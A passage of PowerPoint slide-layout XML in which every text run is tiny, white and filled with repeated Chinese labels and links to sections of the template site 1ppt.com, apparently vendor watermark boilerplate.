              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout126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26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26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26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2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27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27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27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27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27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27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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout127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27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27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27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2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28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28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28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28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28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28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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout128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28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28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28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2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29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29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29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29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29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29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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
